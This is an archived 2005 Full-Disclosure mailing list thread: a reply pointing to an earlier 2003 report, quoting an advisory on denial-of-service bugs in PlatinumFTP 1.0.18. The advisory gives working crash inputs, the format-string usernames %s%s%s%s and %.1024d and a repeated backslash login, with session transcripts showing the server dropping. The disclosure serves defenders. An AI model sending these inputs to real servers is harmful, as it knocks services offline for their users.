lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <003501c52725$7b0d4e70$1e00a8c0@eniac>
From: gary at pointblanksecurity.com (Gary H. Jones II)
Subject: PlatinumFTP 1.0.18 remote DoS

Reported in 2003 already... classic format string vulnerabilities
http://www.derkeiler.com/Mailing-Lists/Securiteam/2003-12/0080.html

-gary



----- Original Message ----- 
From: "ports" <ml@...tsonline.net>
To: <full-disclosure@...ts.grok.org.uk>
Sent: Saturday, March 12, 2005 11:57 AM
Subject: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS


> Application: PlantinumFTP
> Site:        http://www.roboshareware.com/indexplatinumftp.php
> Version:     1.0.18 and maybe lower
> OS:          Windows
> Bug:         Remote Denial of Service
> 
> 
> =====
> Product:
> PlatinumFTPserver simplifies management of all your Ftp clients with
> regards to sending and receiving program and data files over an IP
> connection.
> 
> 
> =====
> About:
> I didn't found any informations about the Bugs I've found and the
> vendor doesn't seem to be interested in fixing problems (see History).
> Since PlatinumFTP isn't a mainstream server I decided to make this
> Disclosure.
> 
> Well, I found 3 different ways do shut down (denial of service) a
> PlatinumFTP 1.0.18 server. At least you doesn't need a valid user.
> 
> 
> =====
> First Bug:
> You can stop the server using %s%s%s%s as username.
> 
> -------------------- schnipp --------------------
> ports@...m:~$ ftp 192.168.10.101
> Connected to 192.168.10.101.
> 220-PlatinumFTPserver V1.0.18
> 220 Enter login details
> Name (192.168.10.101:ports): %s%s%s%s
> 421 Service not available, remote server has closed connection
> Login failed.
> No control connection for command: Transport endpoint is not connected
> ftp>
> -------------------- schnapp --------------------
> 
> 
> =====
> Second Bug:
> You can stop the server using %.1024d as username.
> 
> -------------------- schnipp --------------------
> ports@...m:~$ ftp 192.168.10.101
> Connected to 192.168.10.101.
> 220-PlatinumFTPserver V1.0.18
> 220 Enter login details
> Name (192.168.10.101:ports): %.1024d
> 331 Password required for 000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 000000000000000000000000000000421 Service not available, remote server
> has closed connection
> Login failed.
> No control connection for command: Transport endpoint is not connected
> ftp>
> -------------------- schnapp --------------------
> 
> 
> =====
> Third Bug:
> Well, shuting down a server using the third bug is, compared to the
> first Bugs, really tricky *cough*. If you put in a \ as username the
> Server will show a requester on his console saying 'Incorrect Format:
> HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'.
> The ftp login process for the current session will stop until someone
> affirmed this message.
> 
> I wrote a little perl script to see if it's possible to shut the server
> down and it's working. You just have to connect a couple of times using
> the username \ and after a few connections (>50) the server will crash.
> 
> Since most of you guys know how to write a script like that I doens't
> attach it :) Of course you can find them later on my homepage.
> 
> 
> =====
> History:
> 2005-03-05: Found the Bugs and mailed the vendor
> 2005-03-07: Mailed the vendor again using all mailaddresse I found
> 2005-03-10: Created a yahoo-account *sigh* to make a forum post
> 2005-03-12: Still no response...
> 
> 
> 
> Well, now let's count the hours/days until someone is telling me I'm a
> fool because I didn't made a working exploit out of it.
> 
> 
> ports
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://www.secunia.com/
> 
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ